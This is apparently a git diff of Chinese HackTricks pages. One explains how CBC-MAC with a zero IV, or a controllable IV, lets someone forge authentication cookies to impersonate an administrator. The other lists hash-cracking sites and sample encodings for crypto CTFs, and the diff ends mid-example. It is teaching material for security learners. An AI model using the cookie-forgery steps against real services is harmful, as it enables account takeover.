|
||||
|
||||
|
||||
|
||||
{% hint style="success" %}
|
||||
学习并练习AWS黑客:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
|
||||
学习并练习GCP黑客:<img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks 培训 GCP 红队专家 (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
|
||||
|
||||
<details>
|
||||
|
||||
<summary>支持 HackTricks</summary>
|
||||
|
||||
* 检查 [**订阅计划**](https://github.com/sponsors/carlospolop)!
|
||||
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**telegram 群组**](https://t.me/peass) 或 **关注** 我们的 **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
|
||||
* 通过向 [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 来分享黑客技巧。
|
||||
|
||||
</details>
|
||||
{% endhint %}
|
||||
|
|
|
@ -1,39 +1,40 @@
|
|||
{% hint style="success" %}
|
||||
学习并练习AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
|
||||
学习并练习GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks 培训 GCP 红队专家 (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>从零开始学习AWS黑客技术,成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE(HackTricks AWS红队专家)</strong></a><strong>!</strong></summary>
|
||||
<summary>支持 HackTricks</summary>
|
||||
|
||||
支持HackTricks的其他方式:
|
||||
|
||||
* 如果您想在HackTricks中看到您的**公司广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
|
||||
* 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com)
|
||||
* 探索[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们独家的[**NFTs**](https://opensea.io/collection/the-peass-family)收藏品
|
||||
* **加入** 💬 [**Discord群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或在**Twitter**上关注我们 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**。**
|
||||
* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。
|
||||
* 检查[**订阅计划**](https://github.com/sponsors/carlospolop)!
|
||||
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或 **关注**我们的**Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
|
||||
* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 来分享黑客技巧。
|
||||
|
||||
</details>
|
||||
{% endhint %}
|
||||
|
||||
|
||||
# CBC
|
||||
|
||||
如果**cookie**只是**用户名**(或cookie的第一部分是用户名),而您想要冒充用户名"**admin**"。那么,您可以创建用户名**"bdmin"**并**暴力破解**cookie的**第一个字节**。
|
||||
如果**cookie**只是**用户名**(或 cookie 的第一部分是用户名),而您想要冒充用户名"**admin**"。那么,您可以创建用户名**"bdmin"**并**暴力破解** cookie 的**第一个字节**。
|
||||
|
||||
# CBC-MAC
|
||||
|
||||
在密码学中,**密码块链接消息认证码**(**CBC-MAC**)是一种从块密码构造消息认证码的技术。消息使用某种块密码算法在CBC模式下加密,以创建一个**块链,使得每个块依赖于前一个块的正确加密**。这种相互依赖确保对**任何**明文**位**的更改将导致**最终加密块**以一种不能预测或抵消的方式发生**更改**,而不知道块密码的密钥。
|
||||
**密码块链接消息认证码**(**CBC-MAC**)是密码学中使用的一种方法。它通过逐块加密消息来工作,其中每个块的加密与前一个块相关联。这个过程创建了一个**块链**,确保即使更改原始消息的一个位,也会导致加密数据的最后一个块发生不可预测的变化。要进行或逆转这样的更改,需要加密密钥,确保安全性。
|
||||
|
||||
要计算消息m的CBC-MAC,需要使用零初始化向量在CBC模式下加密m并保留最后一个块。以下图示了使用秘密密钥k和块密码E计算消息包含块的CBC-MAC![m\_{1}\\|m\_{2}\\|\cdots \\|m\_{x}](https://wikimedia.org/api/rest\_v1/media/math/render/svg/bbafe7330a5e40a04f01cc776c9d94fe914b17f5)的计算过程:
|
||||
要计算消息 m 的 CBC-MAC,需要使用零初始化向量在 CBC 模式下加密 m 并保留最后一个块。以下图示了使用秘密密钥 k 和块密码 E 计算消息组成的块的 CBC-MAC 的计算过程![https://wikimedia.org/api/rest\_v1/media/math/render/svg/bbafe7330a5e40a04f01cc776c9d94fe914b17f5](https://wikimedia.org/api/rest\_v1/media/math/render/svg/bbafe7330a5e40a04f01cc776c9d94fe914b17f5):
|
||||
|
||||
![CBC-MAC structure (en).svg](https://upload.wikimedia.org/wikipedia/commons/thumb/b/bf/CBC-MAC\_structure\_\(en\).svg/570px-CBC-MAC\_structure\_\(en\).svg.png)
|
||||
![https://upload.wikimedia.org/wikipedia/commons/thumb/b/bf/CBC-MAC\_structure\_\(en\).svg/570px-CBC-MAC\_structure\_\(en\).svg.png](https://upload.wikimedia.org/wikipedia/commons/thumb/b/bf/CBC-MAC\_structure\_\(en\).svg/570px-CBC-MAC\_structure\_\(en\).svg.png)
|
||||
|
||||
# 漏洞
|
||||
|
||||
使用CBC-MAC时,通常使用的**IV为0**。\
|
||||
这是一个问题,因为独立的2个已知消息(`m1`和`m2`)将生成2个签名(`s1`和`s2`)。因此:
|
||||
使用 CBC-MAC 时通常使用的**初始化向量为 0**。\
|
||||
这是一个问题,因为独立的 2 个已知消息(`m1` 和 `m2`)将生成 2 个签名(`s1` 和 `s2`)。因此:
|
||||
|
||||
* `E(m1 XOR 0) = s1`
|
||||
* `E(m2 XOR 0) = s2`
|
||||
|
||||
然后,由m1和m2连接而成的消息(m3)将生成2个签名(s31和s32):
|
||||
然后,由 m1 和 m2 连接而成的消息(m3)将生成 2 个签名(s31 和 s32):
|
||||
|
||||
* `E(m1 XOR 0) = s31 = s1`
|
||||
* `E(m2 XOR s1) = s32`
|
||||
|
@ -46,36 +47,37 @@
|
|||
* `rator\00\00\00`
|
||||
|
||||
您可以创建一个名为**Administ**(m1)的用户名并检索签名(s1)。\
|
||||
然后,您可以创建一个名为`rator\00\00\00 XOR s1`结果的用户名。这将生成`E(m2 XOR s1 XOR 0)`,即s32。\
|
||||
现在,您可以使用s32作为完整名称**Administrator**的签名。
|
||||
然后,您可以创建一个用户名,称为`rator\00\00\00 XOR s1`的结果。这将生成`E(m2 XOR s1 XOR 0)`,即 s32。\
|
||||
现在,您可以使用 s32 作为完整名称**Administrator**的签名。
|
||||
|
||||
### 总结
|
||||
|
||||
1. 获取用户名**Administ**(m1)的签名,即s1
|
||||
2. 获取用户名**rator\x00\x00\x00 XOR s1 XOR 0**的签名为s32**。**
|
||||
3. 将cookie设置为s32,它将成为用户**Administrator**的有效cookie。
|
||||
1. 获取用户名**Administ**(m1)的签名,即 s1
|
||||
2. 获取用户名**rator\x00\x00\x00 XOR s1 XOR 0**的签名为 s32**。**
|
||||
3. 将 cookie 设置为 s32,它将成为用户**Administrator**的有效 cookie。
|
||||
|
||||
# 攻击控制IV
|
||||
# 攻击控制 IV
|
||||
|
||||
如果您可以控制使用的IV,则攻击可能会变得非常容易。\
|
||||
如果cookie只是加密的用户名,要冒充用户"**administrator**",您可以创建用户"**Administrator**"并获取其cookie。\
|
||||
现在,如果您可以控制IV,您可以更改IV的第一个字节,使得**IV\[0] XOR "A" == IV'\[0] XOR "a"**,并重新生成用户**Administrator**的cookie。这个cookie将有效地**冒充**初始**IV**下的用户**administrator**。
|
||||
如果您可以控制使用的 IV,攻击可能会变得非常容易。\
|
||||
如果 cookie 只是加密的用户名,要冒充用户"**administrator**",您可以创建用户"**Administrator**"并获取其 cookie。\
|
||||
现在,如果您可以控制 IV,您可以更改 IV 的第一个字节,使得**IV\[0] XOR "A" == IV'\[0] XOR "a"**,并重新生成用户**Administrator**的 cookie。这个 cookie 将有效地**冒充**初始**IV**下的用户**administrator**。
|
||||
|
||||
# 参考
|
||||
## 参考
|
||||
|
||||
更多信息请参阅[https://en.wikipedia.org/wiki/CBC-MAC](https://en.wikipedia.org/wiki/CBC-MAC)
|
||||
|
||||
|
||||
{% hint style="success" %}
|
||||
学习并练习AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
|
||||
学习并练习GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks 培训 GCP 红队专家 (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>从零开始学习AWS黑客技术,成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE(HackTricks AWS红队专家)</strong></a><strong>!</strong></summary>
|
||||
<summary>支持 HackTricks</summary>
|
||||
|
||||
支持HackTricks的其他方式:
|
||||
|
||||
* 如果您想在HackTricks中看到您的**公司广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
|
||||
* 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com)
|
||||
* 探索[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们独家的[**NFTs**](https://opensea.io/collection/the-peass-family)收藏品
|
||||
* **加入** 💬 [**Discord群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或在**Twitter**上关注我们 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**。**
|
||||
* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。
|
||||
* 检查[**订阅计划**](https://github.com/sponsors/carlospolop)!
|
||||
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或 **关注**我们的**Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
|
||||
* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 来分享黑客技巧。
|
||||
|
||||
</details>
|
||||
{% endhint %}
|
||||
|
|
|
@ -1,130 +1,131 @@
|
|||
# Crypto CTFs 技巧
|
||||
|
||||
{% hint style="success" %}
|
||||
学习并练习 AWS 黑客技巧:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
|
||||
学习并练习 GCP 黑客技巧:<img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks 培训 GCP 红队专家 (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>从零开始学习 AWS 黑客技术,成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE(HackTricks AWS 红队专家)</strong></a><strong>!</strong></summary>
|
||||
<summary>支持 HackTricks</summary>
|
||||
|
||||
支持 HackTricks 的其他方式:
|
||||
|
||||
- 如果您想看到您的**公司在 HackTricks 中做广告**或**下载 PDF 版本的 HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
|
||||
- 获取[**官方 PEASS & HackTricks 商品**](https://peass.creator-spring.com)
|
||||
- 探索[**PEASS 家族**](https://opensea.io/collection/the-peass-family),我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
- **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或在 **Twitter** 🐦 上关注我们 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**。**
|
||||
- 通过向 [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 来分享您的黑客技巧。
|
||||
* 检查[**订阅计划**](https://github.com/sponsors/carlospolop)!
|
||||
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**telegram 群组**](https://t.me/peass) 或 **关注**我们的 **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**。**
|
||||
* 通过向 [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 来分享黑客技巧。
|
||||
|
||||
</details>
|
||||
{% endhint %}
|
||||
|
||||
## 在线哈希数据库
|
||||
|
||||
- _**谷歌搜索**_
|
||||
- [http://hashtoolkit.com/reverse-hash?hash=4d186321c1a7f0f354b297e8914ab240](http://hashtoolkit.com/reverse-hash?hash=4d186321c1a7f0f354b297e8914ab240)
|
||||
- [https://www.onlinehashcrack.com/](https://www.onlinehashcrack.com)
|
||||
- [https://crackstation.net/](https://crackstation.net)
|
||||
- [https://md5decrypt.net/](https://md5decrypt.net)
|
||||
- [https://www.onlinehashcrack.com](https://www.onlinehashcrack.com)
|
||||
- [https://gpuhash.me/](https://gpuhash.me)
|
||||
- [https://hashes.org/search.php](https://hashes.org/search.php)
|
||||
- [https://www.cmd5.org/](https://www.cmd5.org)
|
||||
- [https://hashkiller.co.uk/Cracker/MD5](https://hashkiller.co.uk/Cracker/MD5)
|
||||
- [https://www.md5online.org/md5-decrypt.html](https://www.md5online.org/md5-decrypt.html)
|
||||
* _**谷歌搜索**_
|
||||
* [http://hashtoolkit.com/reverse-hash?hash=4d186321c1a7f0f354b297e8914ab240](http://hashtoolkit.com/reverse-hash?hash=4d186321c1a7f0f354b297e8914ab240)
|
||||
* [https://www.onlinehashcrack.com/](https://www.onlinehashcrack.com)
|
||||
* [https://crackstation.net/](https://crackstation.net)
|
||||
* [https://md5decrypt.net/](https://md5decrypt.net)
|
||||
* [https://www.onlinehashcrack.com](https://www.onlinehashcrack.com)
|
||||
* [https://gpuhash.me/](https://gpuhash.me)
|
||||
* [https://hashes.org/search.php](https://hashes.org/search.php)
|
||||
* [https://www.cmd5.org/](https://www.cmd5.org)
|
||||
* [https://hashkiller.co.uk/Cracker/MD5](https://hashkiller.co.uk/Cracker/MD5)
|
||||
* [https://www.md5online.org/md5-decrypt.html](https://www.md5online.org/md5-decrypt.html)
|
||||
|
||||
## 魔术自动解密器
|
||||
|
||||
- [**https://github.com/Ciphey/Ciphey**](https://github.com/Ciphey/Ciphey)
|
||||
- [https://gchq.github.io/CyberChef/](https://gchq.github.io/CyberChef/)(魔术模块)
|
||||
- [https://github.com/dhondta/python-codext](https://github.com/dhondta/python-codext)
|
||||
- [https://www.boxentriq.com/code-breaking](https://www.boxentriq.com/code-breaking)
|
||||
* [**https://github.com/Ciphey/Ciphey**](https://github.com/Ciphey/Ciphey)
|
||||
* [https://gchq.github.io/CyberChef/](https://gchq.github.io/CyberChef/) (魔术模块)
|
||||
* [https://github.com/dhondta/python-codext](https://github.com/dhondta/python-codext)
|
||||
* [https://www.boxentriq.com/code-breaking](https://www.boxentriq.com/code-breaking)
|
||||
|
||||
## 编码器
|
||||
|
||||
大多数编码数据可以使用以下两个资源解码:
|
||||
大多数编码数据可以使用以下两个资源进行解码:
|
||||
|
||||
- [https://www.dcode.fr/tools-list](https://www.dcode.fr/tools-list)
|
||||
- [https://gchq.github.io/CyberChef/](https://gchq.github.io/CyberChef/)
|
||||
* [https://www.dcode.fr/tools-list](https://www.dcode.fr/tools-list)
|
||||
* [https://gchq.github.io/CyberChef/](https://gchq.github.io/CyberChef/)
|
||||
|
||||
### 替换自动解密器
|
||||
|
||||
- [https://www.boxentriq.com/code-breaking/cryptogram](https://www.boxentriq.com/code-breaking/cryptogram)
|
||||
- [https://quipqiup.com/](https://quipqiup.com) - 非常好!
|
||||
* [https://www.boxentriq.com/code-breaking/cryptogram](https://www.boxentriq.com/code-breaking/cryptogram)
|
||||
* [https://quipqiup.com/](https://quipqiup.com) - 非常好!
|
||||
|
||||
#### 凯撒密码 - ROTx 自动解密器
|
||||
|
||||
- [https://www.nayuki.io/page/automatic-caesar-cipher-breaker-javascript](https://www.nayuki.io/page/automatic-caesar-cipher-breaker-javascript)
|
||||
* [https://www.nayuki.io/page/automatic-caesar-cipher-breaker-javascript](https://www.nayuki.io/page/automatic-caesar-cipher-breaker-javascript)
|
||||
|
||||
#### 阿特巴什密码
|
||||
|
||||
- [http://rumkin.com/tools/cipher/atbash.php](http://rumkin.com/tools/cipher/atbash.php)
|
||||
* [http://rumkin.com/tools/cipher/atbash.php](http://rumkin.com/tools/cipher/atbash.php)
|
||||
|
||||
### 基础编码自动解密器
|
||||
|
||||
使用以下链接检查所有这些基础:[https://github.com/dhondta/python-codext](https://github.com/dhondta/python-codext)
|
||||
使用以下链接检查所有这些基础编码:[https://github.com/dhondta/python-codext](https://github.com/dhondta/python-codext)
|
||||
|
||||
- **Ascii85**
|
||||
- `BQ%]q@psCd@rH0l`
|
||||
- **Base26** \[_A-Z_]
|
||||
- `BQEKGAHRJKHQMVZGKUXNT`
|
||||
- **Base32** \[_A-Z2-7=_]
|
||||
- `NBXWYYLDMFZGCY3PNRQQ====`
|
||||
- **Zbase32** \[_ybndrfg8ejkmcpqxot1uwisza345h769_]
|
||||
- `pbzsaamdcf3gna5xptoo====`
|
||||
- **Base32 Geohash** \[_0-9b-hjkmnp-z_]
|
||||
- `e1rqssc3d5t62svgejhh====`
|
||||
- **Base32 Crockford** \[_0-9A-HJKMNP-TV-Z_]
|
||||
- `D1QPRRB3C5S62RVFDHGG====`
|
||||
- **Base32 Extended Hexadecimal** \[_0-9A-V_]
|
||||
- `D1NMOOB3C5P62ORFDHGG====`
|
||||
- **Base45** \[_0-9A-Z $%\*+-./:_]
|
||||
- `59DPVDGPCVKEUPCPVD`
|
||||
- **Base58 (bitcoin)** \[_1-9A-HJ-NP-Za-km-z_]
|
||||
- `2yJiRg5BF9gmsU6AC`
|
||||
- **Base58 (flickr)** \[_1-9a-km-zA-HJ-NP-Z_]
|
||||
- `2YiHqF5bf9FLSt6ac`
|
||||
- **Base58 (ripple)** \[_rpshnaf39wBUDNEGHJKLM4PQ-T7V-Z2b-eCg65jkm8oFqi1tuvAxyz_]
|
||||
- `pyJ5RgnBE9gm17awU`
|
||||
- **Base62** \[_0-9A-Za-z_]
|
||||
- `g2AextRZpBKRBzQ9`
|
||||
- **Base64** \[_A-Za-z0-9+/=_]
|
||||
- `aG9sYWNhcmFjb2xh`
|
||||
- **Base67** \[_A-Za-z0-9-_.!\~\_]
|
||||
- `NI9JKX0cSUdqhr!p`
|
||||
- **Base85 (Ascii85)** \[_!"#$%&'()\*+,-./0-9:;<=>?@A-Z\[\\]^\_\`a-u_]
|
||||
- `BQ%]q@psCd@rH0l`
|
||||
- **Base85 (Adobe)** \[_!"#$%&'()\*+,-./0-9:;<=>?@A-Z\[\\]^\_\`a-u_]
|
||||
- `<~BQ%]q@psCd@rH0l~>`
|
||||
- **Base85 (IPv6 or RFC1924)** \[_0-9A-Za-z!#$%&()\*+-;<=>?@^_\`{|}\~\_]
|
||||
- `Xm4y`V\_|Y(V{dF>\`
|
||||
- **Base85 (xbtoa)** \[_!"#$%&'()\*+,-./0-9:;<=>?@A-Z\[\\]^\_\`a-u_]
|
||||
- `xbtoa Begin\nBQ%]q@psCd@rH0l\nxbtoa End N 12 c E 1a S 4e6 R 6991d`
|
||||
- **Base85 (XML)** \[_0-9A-Za-y!#$()\*+,-./:;=?@^\`{|}\~z\__]
|
||||
- `Xm4y|V{~Y+V}dF?`
|
||||
- **Base91** \[_A-Za-z0-9!#$%&()\*+,./:;<=>?@\[]^\_\`{|}\~"_]
|
||||
- `frDg[*jNN!7&BQM`
|
||||
- **Base100** \[]
|
||||
- `👟👦👣👘👚👘👩👘👚👦👣👘`
|
||||
- **Base122** \[]
|
||||
- `4F ˂r0Xmvc`
|
||||
- **ATOM-128** \[_/128GhIoPQROSTeUbADfgHijKLM+n0pFWXY456xyzB7=39VaqrstJklmNuZvwcdEC_]
|
||||
- `MIc3KiXa+Ihz+lrXMIc3KbCC`
|
||||
- **HAZZ15** \[_HNO4klm6ij9n+J2hyf0gzA8uvwDEq3X1Q7ZKeFrWcVTts/MRGYbdxSo=ILaUpPBC5_]
|
||||
- `DmPsv8J7qrlKEoY7`
|
||||
- **MEGAN35** \[_3G-Ub=c-pW-Z/12+406-9Vaq-zA-F5_]
|
||||
- `kLD8iwKsigSalLJ5`
|
||||
- **ZONG22** \[_ZKj9n+yf0wDVX1s/5YbdxSo=ILaUpPBCHg8uvNO4klm6iJGhQ7eFrWczAMEq3RTt2_]
|
||||
- `ayRiIo1gpO+uUc7g`
|
||||
- **ESAB46** \[]
|
||||
- `3sHcL2NR8WrT7mhR`
|
||||
- **MEGAN45** \[]
|
||||
- `kLD8igSXm2KZlwrX`
|
||||
- **TIGO3FX** \[]
|
||||
- `7AP9mIzdmltYmIP9mWXX`
|
||||
- **TRIPO5** \[]
|
||||
- `UE9vSbnBW6psVzxB`
|
||||
- **FERON74** \[]
|
||||
- `PbGkNudxCzaKBm0x`
|
||||
- **GILA7** \[]
|
||||
- `D+nkv8C1qIKMErY1`
|
||||
- **Citrix CTX1** \[]
|
||||
- `MNGIKCAHMOGLKPAKMMGJKNAINPHKLOBLNNHILCBHNOHLLPBK`
|
||||
* **Ascii85**
|
||||
* `BQ%]q@psCd@rH0l`
|
||||
* **Base26** \[_A-Z_]
|
||||
* `BQEKGAHRJKHQMVZGKUXNT`
|
||||
* **Base32** \[_A-Z2-7=_]
|
||||
* `NBXWYYLDMFZGCY3PNRQQ====`
|
||||
* **Zbase32** \[_ybndrfg8ejkmcpqxot1uwisza345h769_]
|
||||
* `pbzsaamdcf3gna5xptoo====`
|
||||
* **Base32 Geohash** \[_0-9b-hjkmnp-z_]
|
||||
* `e1rqssc3d5t62svgejhh====`
|
||||
* **Base32 Crockford** \[_0-9A-HJKMNP-TV-Z_]
|
||||
* `D1QPRRB3C5S62RVFDHGG====`
|
||||
* **Base32 Extended Hexadecimal** \[_0-9A-V_]
|
||||
* `D1NMOOB3C5P62ORFDHGG====`
|
||||
* **Base45** \[_0-9A-Z $%\*+-./:_]
|
||||
* `59DPVDGPCVKEUPCPVD`
|
||||
* **Base58 (bitcoin)** \[_1-9A-HJ-NP-Za-km-z_]
|
||||
* `2yJiRg5BF9gmsU6AC`
|
||||
* **Base58 (flickr)** \[_1-9a-km-zA-HJ-NP-Z_]
|
||||
* `2YiHqF5bf9FLSt6ac`
|
||||
* **Base58 (ripple)** \[_rpshnaf39wBUDNEGHJKLM4PQ-T7V-Z2b-eCg65jkm8oFqi1tuvAxyz_]
|
||||
* `pyJ5RgnBE9gm17awU`
|
||||
* **Base62** \[_0-9A-Za-z_]
|
||||
* `g2AextRZpBKRBzQ9`
|
||||
* **Base64** \[_A-Za-z0-9+/=_]
|
||||
* `aG9sYWNhcmFjb2xh`
|
||||
* **Base67** \[_A-Za-z0-9-_.!\~\_]
|
||||
* `NI9JKX0cSUdqhr!p`
|
||||
* **Base85 (Ascii85)** \[_!"#$%&'()\*+,-./0-9:;<=>?@A-Z\[\\]^\_\`a-u_]
|
||||
* `BQ%]q@psCd@rH0l`
|
||||
* **Base85 (Adobe)** \[_!"#$%&'()\*+,-./0-9:;<=>?@A-Z\[\\]^\_\`a-u_]
|
||||
* `<~BQ%]q@psCd@rH0l~>`
|
||||
* **Base85 (IPv6 or RFC1924)** \[_0-9A-Za-z!#$%&()\*+-;<=>?@^_\`{|}\~\_]
|
||||
* `Xm4y`V\_|Y(V{dF>\`
|
||||
* **Base85 (xbtoa)** \[_!"#$%&'()\*+,-./0-9:;<=>?@A-Z\[\\]^\_\`a-u_]
|
||||
* `xbtoa Begin\nBQ%]q@psCd@rH0l\nxbtoa End N 12 c E 1a S 4e6 R 6991d`
|
||||
* **Base85 (XML)** \[_0-9A-Za-y!#$()\*+,-./:;=?@^\`{|}\~z\__]
|
||||
* `Xm4y|V{~Y+V}dF?`
|
||||
* **Base91** \[_A-Za-z0-9!#$%&()\*+,./:;<=>?@\[]^\_\`{|}\~"_]
|
||||
* `frDg[*jNN!7&BQM`
|
||||
* **Base100** \[]
|
||||
* `👟👦👣👘👚👘👩👘👚👦👣👘`
|
||||
* **Base122** \[]
|
||||
* `4F ˂r0Xmvc`
|
||||
* **ATOM-128** \[_/128GhIoPQROSTeUbADfgHijKLM+n0pFWXY456xyzB7=39VaqrstJklmNuZvwcdEC_]
|
||||
* `MIc3KiXa+Ihz+lrXMIc3KbCC`
|
||||
* **HAZZ15** \[_HNO4klm6ij9n+J2hyf0gzA8uvwDEq3X1Q7ZKeFrWcVTts/MRGYbdxSo=ILaUpPBC5_]
|
||||
* `DmPsv8J7qrlKEoY7`
|
||||
* **MEGAN35** \[_3G-Ub=c-pW-Z/12+406-9Vaq-zA-F5_]
|
||||
* `kLD8iwKsigSalLJ5`
|
||||
* **ZONG22** \[_ZKj9n+yf0wDVX1s/5YbdxSo=ILaUpPBCHg8uvNO4klm6iJGhQ7eFrWczAMEq3RTt2_]
|
||||
* `ayRiIo1gpO+uUc7g`
|
||||
* **ESAB46** \[]
|
||||
* `3sHcL2NR8WrT7mhR`
|
||||
* **MEGAN45** \[]
|
||||
* `kLD8igSXm2KZlwrX`
|
||||
* **TIGO3FX** \[]
|
||||
* `7AP9mIzdmltYmIP9mWXX`
|
||||
* **TRIPO5** \[]
|
||||
* `UE9vSbnBW6psVzxB`
|
||||
* **FERON74** \[]
|
||||
* `PbGkNudxCzaKBm0x`
|
||||
* **GILA7** \[]
|
||||
* `D+nkv8C1qIKMErY1`
|
||||
* **Citrix CTX1** \[]
|
||||
* `MNGIKCAHMOGLKPAKMMGJKNAINPHKLOBLNNHILCBHNOHLLPBK`
|
||||
|
||||
[http://k4.cba.pl/dw/crypo/tools/eng\_atom128c.html](http://k4.cba.pl/dw/crypo/tools/eng\_atom128c.html) - 404 Dead: [https://web.archive.org/web/20190228181208/http://k4.cba.pl/dw/crypo/tools/eng\_hackerize.html](https://web.archive.org/web/20190228181208/http://k4.cba.pl/dw/crypo/tools/eng\_hackerize.html)
|
||||
|
||||
|
@ -142,11 +143,9 @@
|
|||
```
|
||||
.... --- .-.. -.-. .- .-. .- -.-. --- .-.. .-
|
||||
```
|
||||
* [http://k4.cba.pl/dw/crypo/tools/eng\_morse-encode.html](http://k4.cba.pl/dw/crypo/tools/eng\_morse-encode.html) - 404 Dead: [https://gchq.github.io/CyberChef/](https://gchq.github.io/CyberChef/)
|
||||
* [http://k4.cba.pl/dw/crypo/tools/eng\_morse-encode.html](http://k4.cba.pl/dw/crypo/tools/eng\_morse-encode.html) - 404 页面不存在: [https://gchq.github.io/CyberChef/](https://gchq.github.io/CyberChef/)
|
||||
|
||||
### UUencoder
|
||||
|
||||
* [http://k4.cba.pl/dw/crypo/tools/eng\_morse-encode.html](http://k4.cba.pl/dw/crypo/tools/eng\_morse-encode.html) - 404 死链: [https://gchq.github.io/CyberChef/](https://gchq.github.io/CyberChef/)
|
||||
### UU编码器
|
||||
```
|
||||
begin 644 webutils_pl
|
||||
M2$],04A/3$%(3TQ!2$],04A/3$%(3TQ!2$],04A/3$%(3TQ!2$],04A/3$%(
|
||||
|
@ -157,7 +156,7 @@ end
|
|||
```
|
||||
* [http://www.webutils.pl/index.php?idx=uu](http://www.webutils.pl/index.php?idx=uu)
|
||||
|
||||
### XXEncoder
|
||||
### XX编码器
|
||||
```
|
||||
begin 644 webutils_pl
|
||||
hG2xAEIVDH236Hol-G2xAEIVDH236Hol-G2xAEIVDH236Hol-G2xAEIVDH236
|
||||
|
@ -168,9 +167,7 @@ end
|
|||
|
||||
### YEncoder
|
||||
|
||||
* [www.webutils.pl/index.php?idx=xx](https://github.com/carlospolop/hacktricks/tree/bf578e4c5a955b4f6cdbe67eb4a543e16a3f848d/crypto/www.webutils.pl/index.php?idx=xx)
|
||||
|
||||
### YEncoder
|
||||
### Y编码
|
||||
```
|
||||
=ybegin line=128 size=28 name=webutils_pl
|
||||
ryvkryvkryvkryvkryvkryvkryvk
|
||||
|
@ -235,7 +232,7 @@ AABBB ABBAB ABABA AAAAA AAABA AAAAA BAAAA AAAAA AAABA ABBAB ABABA AAAAA
|
|||
|
||||
## 压缩
|
||||
|
||||
**原始压缩** 和 **原始解压**(您可以在 Cyberchef 中找到)可以在没有标头的情况下压缩和解压数据。
|
||||
**原始压缩** 和 **原始解压**(你可以在 Cyberchef 中找到)可以压缩和解压数据而不带头部信息。
|
||||
|
||||
## 简单加密
|
||||
|
||||
|
@ -263,7 +260,7 @@ wodsyoidrods
|
|||
|
||||
### Fernet
|
||||
|
||||
2个base64字符串(令牌和密钥)
|
||||
2个base64字符串(token和key)
|
||||
```
|
||||
Token:
|
||||
